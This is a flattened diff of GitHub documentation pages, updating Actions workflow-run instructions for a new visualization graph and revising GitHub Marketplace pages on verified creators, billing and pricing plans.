assets/images/help/classroom/assignment-individual-hero.png Binary file not shown. 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You should see "Hello Mona the Octocat" or the name you used for the `who-to-greet` input and the timestamp printed in the log. From your repository, click the **Actions** tab, and select the latest workflow run. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}Under **Jobs** or in the visualization graph, click **A job to say hello**. {% endif %}You should see "Hello Mona the Octocat" or the name you used for the `who-to-greet` input and the timestamp printed in the log. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} 6 content/actions/creating-actions/creating-a-javascript-action.md @@ -261,9 +261,11 @@ jobs: ``` {% endraw %} From your repository, click the **Actions** tab, and select the latest workflow run. You should see "Hello Mona the Octocat" or the name you used for the `who-to-greet` input and the timestamp printed in the log. From your repository, click the **Actions** tab, and select the latest workflow run. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}Under **Jobs** or in the visualization graph, click **A job to say hello**. {% endif %}You should see "Hello Mona the Octocat" or the name you used for the `who-to-greet` input and the timestamp printed in the log. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@2.22" %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% elsif currentVersion ver_gt "enterprise-server@2.22" %}  {% else %}  4 content/actions/guides/about-packaging-with-github-actions.md @@ -25,7 +25,11 @@ Creating a package at the end of a continuous integration workflow can help duri Now, when reviewing a pull request, you'll be able to look at the workflow run and download the artifact that was produced. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} This will let you run the code in the pull request on your machine, which can help with debugging or testing the pull request. 4 content/actions/guides/building-and-testing-powershell.md @@ -60,7 +60,11 @@ jobs: * `run: Test-Path resultsfile.log` - Check whether a file called `resultsfile.log` is present in the repository's root directory. * `Should -Be $true` - Uses Pester to define an expected result. If the result is unexpected, then {% data variables.product.prodname_actions %} flags this as a failed test. For example: {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} * `Invoke-Pester Unit.Tests.ps1 -Passthru` - Uses Pester to execute tests defined in a file called `Unit.Tests.ps1`. For example, to perform the same test described above, the `Unit.Tests.ps1` will contain the following: ``` 7 content/actions/guides/storing-workflow-data-as-artifacts.md @@ -108,8 +108,6 @@ jobs: path: output/test/code-coverage.html ```  {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@2.22" %} ### Configuring a custom artifact retention period @@ -238,7 +236,12 @@ jobs: echo The result is $value ``` The workflow run will archive any artifacts that it generated. For more information on downloading archived artifacts, see "[Downloading workflow artifacts](/actions/managing-workflow-runs/downloading-workflow-artifacts)." {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} {% if currentVersion == "free-pro-team@latest" %} 8 content/actions/index.md @@ -68,18 +68,18 @@ versions: <h2 class="mb-2 font-mktg h1">Code examples</h2> <div class="pr-lg-3 mb-5 mt-3"> <input class="js-code-example-filter input-lg py-2 px-3 col-12 col-lg-8 form-control" placeholder="Search code examples" type="search" autocomplete="off" aria-label="Search code examples"/> <input class="js-filter-card-filter input-lg py-2 px-3 col-12 col-lg-8 form-control" placeholder="Search code examples" type="search" autocomplete="off" aria-label="Search code examples"/> </div> <div class="d-flex flex-wrap gutter"> {% render 'code-example-card' for actionsCodeExamples as example %} </div> <button class="js-code-example-show-more btn btn-outline float-right">Show more {% octicon "arrow-right" %}</button> <button class="js-filter-card-show-more btn btn-outline float-right">Show more {% octicon "arrow-right" %}</button> <div class="js-code-example-no-results d-none py-4 text-center text-gray font-mktg"> <div class="js-filter-card-no-results d-none py-4 text-center text-gray font-mktg"> <div class="mb-3">{% octicon "search" width="24" %}</div> <h3 class="text-normal">Sorry, there is no result for <strong class="js-code-example-filter-value"></strong></h3> <h3 class="text-normal">Sorry, there is no result for <strong class="js-filter-card-value"></strong></h3> <p class="my-3 f4">It looks like we don't have an example that fits your filter.<br>Try another filter or add your code example</p> <a href="https://github.com/github/docs/blob/main/data/variables/action_code_examples.yml">Learn how to add a code example {% octicon "arrow-right" %}</a> </div> 11 content/actions/learn-github-actions/introduction-to-github-actions.md @@ -204,7 +204,7 @@ In this diagram, you can see the workflow file you just created and how the {% d ### Viewing the job's activity Once your job has started running, you can view each step's activity on {% data variables.product.prodname_dotcom %}. Once your job has started running, you can {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}see a visualization graph of the run's progress and {% endif %}view each step's activity on {% data variables.product.prodname_dotcom %}. {% data reusables.repositories.navigate-to-repo %} 1. Under your repository name, click **Actions**. @@ -213,7 +213,14 @@ Once your job has started running, you can view each step's activity on {% data  1. Under "Workflow runs", click the name of the run you want to see.  {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@2.22" %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %} 1. Under **Jobs** or in the visualization graph, click the job you want to see.  {% endif %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %} 1. View the results of each step.  {% elsif currentVersion ver_gt "enterprise-server@2.22" %} 1. Click on the job name to see the results of each step.  {% else %} 7 content/actions/managing-workflow-runs/canceling-a-workflow.md @@ -17,9 +17,14 @@ versions: {% data reusables.repositories.navigate-to-repo %} {% data reusables.repositories.actions-tab %} {% data reusables.repositories.navigate-to-workflow %} {% data reusables.repositories.view-run %} 1. From the list of workflow runs, click the name of the `queued` or `in progress` run that you want to cancel.  1. In the upper-right corner of the workflow, click **Cancel workflow**. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} ### Steps {% data variables.product.prodname_dotcom %} takes to cancel a workflow run 4 content/actions/managing-workflow-runs/downloading-workflow-artifacts.md @@ -20,4 +20,8 @@ versions: {% data reusables.repositories.navigate-to-workflow %} {% data reusables.repositories.view-run %} 1. Under **Artifacts**, click the artifact you want to download. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} 1 content/actions/managing-workflow-runs/index.md @@ -18,6 +18,7 @@ versions: {% data reusables.actions.enterprise-beta %} {% data reusables.actions.enterprise-github-hosted-runners %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}{% link_in_list /using-the-visualization-graph %}{% endif %} {% link_in_list /viewing-workflow-run-history %} {% link_in_list /using-workflow-run-logs %} {% link_in_list /manually-running-a-workflow %} 3 content/actions/managing-workflow-runs/re-running-a-workflow.md @@ -16,5 +16,4 @@ versions: {% data reusables.repositories.actions-tab %} {% data reusables.repositories.navigate-to-workflow %} {% data reusables.repositories.view-run %} 1. In the upper-right corner of the workflow, use the **Re-run jobs** drop-down menu, and select **Re-run all jobs**.  1. In the upper-right corner of the workflow, use the **Re-run jobs** drop-down menu, and select **Re-run all jobs**.{% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}{% else %}{% endif %} 4 content/actions/managing-workflow-runs/removing-workflow-artifacts.md @@ -27,7 +27,11 @@ versions: {% data reusables.repositories.navigate-to-workflow %} {% data reusables.repositories.view-run %} 1. Under **Artifacts**, click {% octicon "trashcan" aria-label="The trashcan icon" %} next to the artifact you want to remove. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@2.22" %} ### Setting the retention period for an artifact 23 content/actions/managing-workflow-runs/using-the-visualization-graph.md @@ -0,0 +1,23 @@ --- title: Using the visualization graph intro: Every workflow run generates a real-time graph that illustrates the run progress. You can use this graph to monitor and debug workflows. product: '{% data reusables.gated-features.actions %}' versions: free-pro-team: '*' enterprise-server: '>=3.1' --- {% data reusables.actions.enterprise-beta %} {% data reusables.actions.visualization-beta %} {% data reusables.actions.enterprise-github-hosted-runners %} {% data reusables.repositories.navigate-to-repo %} {% data reusables.repositories.actions-tab %} {% data reusables.repositories.navigate-to-workflow %} {% data reusables.repositories.view-run %} 1. The graph displays each job in the workflow. An icon to the left of the job name indicates the status of the job. Lines between jobs indicate dependencies.  2. Click on a job to view the job log.  18 content/actions/managing-workflow-runs/using-workflow-run-logs.md @@ -45,7 +45,11 @@ You can search the build logs for a particular step. When you search logs, only {% data reusables.repositories.navigate-to-job-superlinter %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@2.22" %} 1. In the upper-right corner of the log output, in the **Search logs** search box, type a search query. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} {% else %} 1. To expand each step you want to include in your search, click the step.  @@ -63,8 +67,12 @@ You can download the log files from your workflow run. You can also download a w {% data reusables.repositories.view-run-superlinter %} {% data reusables.repositories.navigate-to-job-superlinter %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@2.22" %} 1. In the upper right corner, click {% octicon "kebab-horizontal" aria-label="The horizontal kebab icon" %} and select **Download log archive**. 1. In the upper right corner, click {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}{% octicon "gear" aria-label="The gear icon" %}{% else %}{% octicon "kebab-horizontal" aria-label="The horizontal kebab icon" %}{% endif %} and select **Download log archive**. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} {% else %} 1. In the upper right corner, click {% octicon "kebab-horizontal" aria-label="The horizontal kebab icon" %} and select **Download log archive**.  @@ -80,9 +88,17 @@ You can delete the log files from your workflow run. {% data reusables.repositor {% data reusables.repositories.view-run-superlinter %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@2.22" %} 1. In the upper right corner, click {% octicon "kebab-horizontal" aria-label="The horizontal kebab icon" %}. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} 2. To delete the log files, click the **Delete all logs** button and review the confirmation prompt. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} After deleting logs, the **Delete all logs** button is removed to indicate that no log files remain in the workflow run. {% else %} 1. In the upper right corner, click {% octicon "kebab-horizontal" aria-label="The horizontal kebab icon" %}. 2 content/actions/managing-workflow-runs/viewing-job-execution-time.md @@ -15,7 +15,7 @@ Billable job execution minutes are only shown for jobs run on private repositori {% data reusables.repositories.actions-tab %} {% data reusables.repositories.navigate-to-workflow %} {% data reusables.repositories.view-run %} 1. Under the job summary, you can view the job's execution time. To view the billable job execution time, click **Run and billable time details**. 1. Under the job summary, you can view the job's execution time. To view details about the billable job execution time, click the time under **Billable time**.  {% note %} 5 content/actions/quickstart.md @@ -60,8 +60,13 @@ Committing the workflow file in your repository triggers the `push` event and ru {% data reusables.repositories.actions-tab %} {% data reusables.repositories.navigate-to-workflow-superlinter %} {% data reusables.repositories.view-run-superlinter %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %} 1. Under **Jobs** or in the visualization graph, click the **Lint code base** job.  {% else %} 1. In the left sidebar, click the **Lint code base** job.  {% endif %} {% data reusables.repositories.view-failed-job-results-superlinter %} ### More starter workflows 49 content/developers/github-marketplace/about-github-marketplace.md @@ -1,6 +1,6 @@ --- title: About GitHub Marketplace intro: 'Learn the basics to prepare your app for review before joining {% data variables.product.prodname_marketplace %}.' intro: 'Learn about {% data variables.product.prodname_marketplace %} where you can share your apps and actions publicly with all {% data variables.product.product_name %} users.' redirect_from: - /apps/marketplace/getting-started/ - /marketplace/getting-started @@ -14,52 +14,41 @@ versions: {% data reusables.actions.actions-not-verified %} To learn about publishing {% data variables.product.prodname_actions %} in the {% data variables.product.prodname_marketplace %}, see "[Publishing actions in GitHub Marketplace](/actions/creating-actions/publishing-actions-in-github-marketplace)." To learn about publishing {% data variables.product.prodname_actions %} in {% data variables.product.prodname_marketplace %}, see "[Publishing actions in GitHub Marketplace](/actions/creating-actions/publishing-actions-in-github-marketplace)." ### Apps You can list verified and unverified apps in {% data variables.product.prodname_marketplace %}. Unverified apps do not go through the security, testing, and verification cycle {% data variables.product.prodname_dotcom %} requires for verified apps. Anyone can share their apps with other users on {% data variables.product.prodname_marketplace %} but only listings that are verified by {% data variables.product.company_short %} can include paid plans. For more information, see "[About verified creators](/developers/github-marketplace/about-verified-creators)." Verified apps have a green badge in {% data variables.product.prodname_marketplace %}. Unverified apps have a grey badge next to their listing and are only available as free apps. If you're interested in creating an app for {% data variables.product.prodname_marketplace %}, but you're new to {% data variables.product.prodname_github_apps %} or {% data variables.product.prodname_oauth_app %}s, see "[Building {% data variables.product.prodname_github_apps %}](/developers/apps/building-github-apps)" or "[Building {% data variables.product.prodname_oauth_app %}s](/developers/apps/building-oauth-apps)."  If you're interested in creating an app for {% data variables.product.prodname_marketplace %}, but you're new to {% data variables.product.prodname_github_apps %} and {% data variables.product.prodname_oauth_app %}s, see "[Building apps](/apps/)." {% data reusables.marketplace.github_apps_preferred %}, although you can list both OAuth and {% data variables.product.prodname_github_app %}s in {% data variables.product.prodname_marketplace %}. See "[Differences between GitHub and OAuth apps](/apps/differences-between-apps/)" for more details. To learn more about switching from OAuth to {% data variables.product.prodname_github_apps %}, see [Migrating OAuth Apps to {% data variables.product.prodname_github_app %}s](/apps/migrating-oauth-apps-to-github-apps/). {% data reusables.marketplace.github_apps_preferred %}, although you can list both OAuth and {% data variables.product.prodname_github_app %}s in {% data variables.product.prodname_marketplace %}. For more information, see "[Differences between {% data variables.product.prodname_github_apps %} and {% data variables.product.prodname_oauth_app %}s](/apps/differences-between-apps/)" and "[Migrating {% data variables.product.prodname_oauth_app %}s to {% data variables.product.prodname_github_apps %}](/apps/migrating-oauth-apps-to-github-apps/)." If you have questions about {% data variables.product.prodname_marketplace %}, please contact {% data variables.contact.contact_support %} directly. #### Unverified Apps Unverified apps do not need to meet the "[Requirements for listing an app on {% data variables.product.prodname_marketplace %}](/marketplace/getting-started/requirements-for-listing-an-app-on-github-marketplace/)" or go through the "[Security review process](/marketplace/getting-started/security-review-process/)". {% data reusables.marketplace.unverified-apps %} Having a published paid plan will prevent you from being able to submit an unverified app. You must remove paid plans or keep them in draft mode before publishing an unverified app. To list your unverified app in {% data variables.product.prodname_marketplace %}, you only need to create a "[Listing on {% data variables.product.prodname_marketplace %}](/marketplace/listing-on-github-marketplace/)" and submit it as an unverified listing. {% data reusables.marketplace.launch-with-free %} ### Publishing an app to {% data variables.product.prodname_marketplace %} #### Verified Apps When you have finished creating your app, you can share it with other users by publishing it to {% data variables.product.prodname_marketplace %}. In summary, the process is: If you've already built an app and you're interested in submitting a verified listing in {% data variables.product.prodname_marketplace %}, start here: 1. Review your app carefully to ensure that it will behave as expected in other repositories and that it follows best practice guidelines. For more information, see "[Security best practices for apps](/developers/github-marketplace/security-best-practices-for-apps)" and "[Requirements for listing an app](/developers/github-marketplace/requirements-for-listing-an-app#best-practice-for-customer-experience)." 1. [Getting started with {% data variables.product.prodname_marketplace %}](/marketplace/getting-started/)<br/>Learn about requirements, guidelines, and the app submission process. 1. Add webhook events to the app to track user billing requests. For more information about the {% data variables.product.prodname_marketplace %} API, webhook events, and billing requests, see "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." 1. [Integrating with the {% data variables.product.prodname_marketplace %} API](/marketplace/integrating-with-the-github-marketplace-api/)<br/>Before you can list your app on {% data variables.product.prodname_marketplace %}, you'll need to integrate billing flows using the {% data variables.product.prodname_marketplace %} API and webhook events. 1. Create a draft {% data variables.product.prodname_marketplace %} listing. For more information, see "[Drafting a listing for your app](/developers/github-marketplace/drafting-a-listing-for-your-app)." 1. [Listing on {% data variables.product.prodname_marketplace %}](/marketplace/listing-on-github-marketplace/) <br/>Create a draft {% data variables.product.prodname_marketplace %} listing, configure webhook settings, and set up pricing plans. 1. Add a pricing plan. For more information, see "[Setting pricing plans for your listing](/developers/github-marketplace/setting-pricing-plans-for-your-listing)." 1. [Selling your app](/marketplace/selling-your-app/)<br/>Learn about pricing plans, billing cycles, and how to receive payment from {% data variables.product.prodname_dotcom %} for your app. 1. Check whether your app meets the requirements for listing on {% data variables.product.prodname_marketplace %} as a free or a paid app. For more information, see "[Requirements for listing an app](/developers/github-marketplace/requirements-for-listing-an-app)." 1. [{% data variables.product.prodname_marketplace %} Insights](/marketplace/github-marketplace-insights/)<br/>See how your app is performing in {% data variables.product.prodname_marketplace %}. You can use metrics collected by {% data variables.product.prodname_dotcom %} to guide your marketing campaign and be successful in {% data variables.product.prodname_marketplace %}. 1. Read and accept the terms of the "[{% data variables.product.prodname_marketplace %} Developer Agreement](/articles/github-marketplace-developer-agreement/)." 1. [{% data variables.product.prodname_marketplace %} transactions](/marketplace/github-marketplace-transactions/)<br/>Download and view transaction data for your {% data variables.product.prodname_marketplace %} listing. 1. Submit your listing for publication in {% data variables.product.prodname_marketplace %}, requesting verification if you want to sell the app. For more information, see "[Submitting your listing for publication](/developers/github-marketplace/submitting-your-listing-for-publication)." ### Reviewing your app An onboarding expert will contact you with any questions or further steps. For example, if you have added a paid plan, you will need to complete the verification process and complete financial onboarding. As soon as your listing is approved the app is published to {% data variables.product.prodname_marketplace %}. We want to make sure that the apps offered on {% data variables.product.prodname_marketplace %} are safe, secure, and well tested. The {% data variables.product.prodname_marketplace %} onboarding specialists will review your app to ensure that it meets all requirements. Follow the guidelines in these articles before submitting your app: ### Seeing how your app is performing You can access metrics and transactions for your listing. For more information, see: * [Requirements for listing an app on {% data variables.product.prodname_marketplace %}](/marketplace/getting-started/requirements-for-listing-an-app-on-github-marketplace/) * [Security review process](/marketplace/getting-started/security-review-process/) - "[Viewing metrics for your listing](/developers/github-marketplace/viewing-metrics-for-your-listing)" - "[Viewing transactions for your listing](/developers/github-marketplace/viewing-transactions-for-your-listing)" 43 content/developers/github-marketplace/about-verified-creators.md @@ -0,0 +1,43 @@ --- title: About verified creators intro: 'Each organization that wants to sell apps on {% data variables.product.prodname_marketplace %} must follow a verification process. Their identity is checked and their billing process reviewed.' versions: free-pro-team: '*' --- ### About verified creators A verified creator is an organization that {% data variables.product.company_short %} has checked. Anyone can share their apps with other users on {% data variables.product.prodname_marketplace %} but only organizations that are verified by {% data variables.product.company_short %} can sell apps. For more information about organizations, see "[About organizations](/github/setting-up-and-managing-organizations-and-teams/about-organizations)." The verification process aims to protect users. For example, it verifies the seller's identity, checks that their {% data variables.product.product_name %} organization is set up securely, and that they can be contacted for support. After passing the verification checks, any apps that the organization lists on {% data variables.product.prodname_marketplace %} are shown with a verified creator badge {% octicon "verified" aria-label="Verified creator badge" %}. The organization can now add paid plans to any of their apps. Each app with a paid plan also goes through a financial onboarding process to check that it's set up to handle billing correctly.  In addition to the verified creator badge, you'll also see badges for unverified and verified apps. These apps were published using the old method for verifying individual apps.  For information on finding apps to use, see "[Searching {% data variables.product.prodname_marketplace %}](/github/searching-for-information-on-github/searching-github-marketplace)." ### About the verification process The first time you request verification for a listing of one of your apps, you will enter the verification process. An onboarding expert will guide you through the process. This includes checking: - Profile information - The basic profile information is populated accurately and appropriately. - Security - The organization has enabled two-factor authentication. - Verified domain - The organization has verified the domain of the site URL. - Purchase webhook event - The event is handled correctly by the app. When your organization is verified, all your apps are shown with a verified creator badge. You are now able to offer paid plans for any of your apps. For more information about the requirements for listing an app on {% data variables.product.prodname_marketplace %}, see "[Requirements for listing an app on {% data variables.product.prodname_marketplace %}](/marketplace/getting-started/requirements-for-listing-an-app-on-github-marketplace/)." {% data reusables.marketplace.app-transfer-to-org-for-verification %} For information on how to do this, see: "[Submitting your listing for publication](/developers/github-marketplace/submitting-your-listing-for-publication#transferring-an-app-to-an-organization-before-you-submit)." {% note %} **Note:** This verification process for apps replaces the previous process where individual apps were verified. The current process is similar to the verification process for actions. If you have apps that were verified under the old process, these will not be affected by the changes. The {% data variables.product.prodname_marketplace %} team will contact you with details of how to migrate to organization-based verification. {% endnote %} 12 content/developers/github-marketplace/billing-customers.md @@ -13,17 +13,17 @@ versions: ### Understanding the billing cycle Customers can choose a monthly or yearly billing cycle when they purchase your app. All changes customers make to the billing cycle and plan selection will trigger a `marketplace_purchase` event. You can refer to the `marketplace_purchase` webhook payload to see which billing cycle a customer selects and when the next billing date begins (`effective_date`). For more information about webhook payloads, see "[{% data variables.product.prodname_marketplace %} webhook events](/marketplace/integrating-with-the-github-marketplace-api/github-marketplace-webhook-events/)." Customers can choose a monthly or yearly billing cycle when they purchase your app. All changes customers make to the billing cycle and plan selection will trigger a `marketplace_purchase` event. You can refer to the `marketplace_purchase` webhook payload to see which billing cycle a customer selects and when the next billing date begins (`effective_date`). For more information about webhook payloads, see "[Webhook events for the {% data variables.product.prodname_marketplace %} API](/developers/github-marketplace/webhook-events-for-the-github-marketplace-api)." ### Providing billing services in your app's UI Customers must be able to perform the following actions from your app's website: - Customers must be able to modify or cancel their {% data variables.product.prodname_marketplace %} plans for personal and organizational accounts separately. Customers should be able to perform the following actions from your app's website: - Customers should be able to modify or cancel their {% data variables.product.prodname_marketplace %} plans for personal and organizational accounts separately. {% data reusables.marketplace.marketplace-billing-ui-requirements %} ### Billing services for upgrades, downgrades, and cancellations Follow these guidelines for upgrades, downgrades, and cancellations to maintain a clear and consistent billing process. For more detailed instructions about the {% data variables.product.prodname_marketplace %} purchase events, see "[Billing flows](/marketplace/integrating-with-the-github-marketplace-api/#billing-flows)." Follow these guidelines for upgrades, downgrades, and cancellations to maintain a clear and consistent billing process. For more detailed instructions about the {% data variables.product.prodname_marketplace %} purchase events, see "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." You can use the `marketplace_purchase` webhook's `effective_date` key to determine when a plan change will occur and periodically synchronize the [List accounts for a plan](/rest/reference/apps#list-accounts-for-a-plan). @@ -33,7 +33,7 @@ When a customer upgrades their pricing plan or changes their billing cycle from {% data reusables.marketplace.marketplace-failed-purchase-event %} For information about building upgrade and downgrade workflows into your app, see "[Upgrading and downgrading plans](/marketplace/integrating-with-the-github-marketplace-api/upgrading-and-downgrading-plans/)." For information about building upgrade and downgrade workflows into your app, see "[Handling plan changes](/developers/github-marketplace/handling-plan-changes)." #### Downgrades and cancellations @@ -45,4 +45,4 @@ When a customer cancels a plan, you must: {% data reusables.marketplace.cancellation-clarification %} - Enable them to upgrade the plan through GitHub if they would like to continue the plan at a later time. For information about building cancellation workflows into your app, see "[Cancelling plans](/marketplace/integrating-with-the-github-marketplace-api/cancelling-plans/)." For information about building cancellation workflows into your app, see "[Handling plan cancellations](/developers/github-marketplace/handling-plan-cancellations)." 20 ...nt/developers/github-marketplace/customer-experience-best-practices-for-apps.md @@ -0,0 +1,20 @@ --- title: Customer experience best practices for apps intro: 'Guidelines for creating an app that will be easy to use and understand.' shortTitle: Customer experience best practice versions: free-pro-team: '*' --- If you follow these best practices it will help you to provide a good customer experience. ### Customer communication - Marketing materials for the app should accurately represent the app's behavior. - Apps should include links to user-facing documentation that describe how to set up and use the app. - Customers should be able to see what type of plan they have in the billing, profile, or account settings section of the app. - Customers should be able to install and use your app on both a personal account and an organization account. They should be able to view and manage the app on those accounts separately. ### Plan management {% data reusables.marketplace.marketplace-billing-ui-requirements %} 4 content/developers/github-marketplace/drafting-a-listing-for-your-app.md @@ -59,8 +59,8 @@ Once you've created a {% data variables.product.prodname_marketplace %} draft li ### Submitting your app Once you've completed your {% data variables.product.prodname_marketplace %} listing, you can submit your listing for review from the **Overview** page. You'll need to read and accept the "[{% data variables.product.prodname_marketplace %} Developer Agreement](/articles/github-marketplace-developer-agreement/)," and then you can click **Submit for review**. After you submit your app for review, the {% data variables.product.prodname_marketplace %} onboarding team will contact you with additional information about the onboarding process. You can learn more about the onboarding and security review process in "[Getting started with {% data variables.product.prodname_marketplace %}](/marketplace/getting-started/)." Once you've completed your {% data variables.product.prodname_marketplace %} listing, you can submit your listing for review from the **Overview** page. You'll need to read and accept the "[{% data variables.product.prodname_marketplace %} Developer Agreement](/articles/github-marketplace-developer-agreement/)," and then you can click **Submit for review**. After you submit your app for review, an onboarding expert will contact you with additional information about the onboarding process. You can learn more about the onboarding and security review process in "[Getting started with {% data variables.product.prodname_marketplace %}](/marketplace/getting-started/)." ### Removing a {% data variables.product.prodname_marketplace %} listing If you no longer want to list your app in {% data variables.product.prodname_marketplace %}, contact [marketplace@github.com](mailto:marketplace@github.com) to remove your listing. If you no longer want to list your app in {% data variables.product.prodname_marketplace %}, contact {% data variables.contact.contact_support %} to remove your listing. 2 content/developers/github-marketplace/handling-new-purchases-and-free-trials.md @@ -28,7 +28,7 @@ GitHub then sends the [`marketplace_purchase`](/webhooks/event-payloads/#marketp Read the `effective_date` and `marketplace_purchase` object from the `marketplace_purchase` webhook to determine which plan the customer purchased, when the billing cycle starts, and when the next billing cycle begins. If your app offers a free trial, read the `marketplace_purchase[on_free_trial]` attribute from the webhook. If the value is `true`, your app will need to track the free trial start date (`effective_date`) and the date the free trial ends (`free_trial_ends_on`). Use the `free_trial_ends_on` date to display the remaining days left in a free trial in your app's UI. You can do this in either a banner or in your [billing UI](/marketplace/selling-your-app/billing-customers-in-github-marketplace/#providing-billing-services-in-your-apps-ui). To learn how to handle cancellations before a free trial ends, see "[Cancelling plans](/marketplace/integrating-with-the-github-marketplace-api/cancelling-plans/)." See "[Upgrading and downgrading plans](/marketplace/integrating-with-the-github-marketplace-api/upgrading-and-downgrading-plans/)" to find out how to transition a free trial to a paid plan when a free trial expires. If your app offers a free trial, read the `marketplace_purchase[on_free_trial]` attribute from the webhook. If the value is `true`, your app will need to track the free trial start date (`effective_date`) and the date the free trial ends (`free_trial_ends_on`). Use the `free_trial_ends_on` date to display the remaining days left in a free trial in your app's UI. You can do this in either a banner or in your [billing UI](/marketplace/selling-your-app/billing-customers-in-github-marketplace/#providing-billing-services-in-your-apps-ui). To learn how to handle cancellations before a free trial ends, see "[Handling plan cancellations](/developers/github-marketplace/handling-plan-cancellations)." See "[Handling plan changes](/developers/github-marketplace/handling-plan-changes)" to find out how to transition a free trial to a paid plan when a free trial expires. See "[{% data variables.product.prodname_marketplace %} webhook events](/marketplace/integrating-with-the-github-marketplace-api/github-marketplace-webhook-events/)" for an example of the `marketplace_purchase` event payload. 6 content/developers/github-marketplace/index.md @@ -11,8 +11,10 @@ versions: {% topic_link_in_list /creating-apps-for-github-marketplace %} {% link_in_list /about-github-marketplace %} {% link_in_list /about-verified-creators %} {% link_in_list /requirements-for-listing-an-app %} {% link_in_list /security-review-process-for-submitted-apps %} {% link_in_list /security-best-practices-for-apps %} {% link_in_list /customer-experience-best-practices-for-apps %} {% link_in_list /viewing-metrics-for-your-listing %} {% link_in_list /viewing-transactions-for-your-listing %} {% topic_link_in_list /using-the-github-marketplace-api-in-your-app %} @@ -27,7 +29,7 @@ versions: {% link_in_list /writing-a-listing-description-for-your-app %} {% link_in_list /setting-pricing-plans-for-your-listing %} {% link_in_list /configuring-a-webhook-to-notify-you-of-plan-changes %} {% link_in_list /submitting-your-listing-for-review %} {% link_in_list /submitting-your-listing-for-publication %} {% topic_link_in_list /selling-your-app-on-github-marketplace %} {% link_in_list /pricing-plans-for-github-marketplace-apps %} {% link_in_list /billing-customers %} 32 content/developers/github-marketplace/pricing-plans-for-github-marketplace-apps.md @@ -10,35 +10,45 @@ versions: {% data variables.product.prodname_marketplace %} pricing plans can be free, flat rate, or per-unit, and GitHub lists the price in US dollars. Customers purchase your app using a payment method attached to their {% data variables.product.product_name %} account, without having to leave GitHub.com. You don't have to write code to perform billing transactions, but you will have to handle [billing flows](/marketplace/integrating-with-the-github-marketplace-api/#billing-flows) for purchase events. {% data variables.product.prodname_marketplace %} pricing plans can be free, flat rate, or per-unit. Prices are set, displayed, and processed in US dollars. Paid plans are restricted to verified listings. Customers purchase your app using a payment method attached to their {% data variables.product.product_name %} account, without having to leave {% data variables.product.prodname_dotcom_the_website %}. You don't have to write code to perform billing transactions, but you will have to handle events from the {% data variables.product.prodname_marketplace %} API. For more information, see "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." If the app you're listing on {% data variables.product.prodname_marketplace %} has multiple plan options, you can set up corresponding pricing plans. For example, if your app has two plan options, an open source plan and a pro plan, you can set up a free pricing plan for your open source plan and a flat pricing plan for your pro plan. Each {% data variables.product.prodname_marketplace %} listing must have an annual and a monthly price for every plan that's listed. For more information on how to create a pricing plan, see "[Setting a {% data variables.product.prodname_marketplace %} listing's pricing plan](/marketplace/listing-on-github-marketplace/setting-a-github-marketplace-listing-s-pricing-plan/)." {% note %} {% data reusables.marketplace.free-plan-note %} **Note:** If you're listing an app on {% data variables.product.prodname_marketplace %}, you can't list your app with a free pricing plan if you offer a paid service outside of {% data variables.product.prodname_marketplace %}. ### Types of pricing plans {% endnote %} #### Free pricing plans ### Types of pricing plans {% data reusables.marketplace.free-apps-encouraged %} Free plans are completely free for users. If you set up a free pricing plan, you cannot charge users that choose the free pricing plan for the use of your app. You can create both free and paid plans for your listing. All apps need to handle events for new purchases and cancellations. Apps that only have free plans do not need to handle events for free trials, upgrades, and downgrades. For more information, see: "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." If you add a paid plan to an app that you've already listed in {% data variables.product.prodname_marketplace %} as a free service, you'll need to request verification for the app and go through financial onboarding. #### Paid pricing plans **Free pricing plans** are completely free for users. If you set 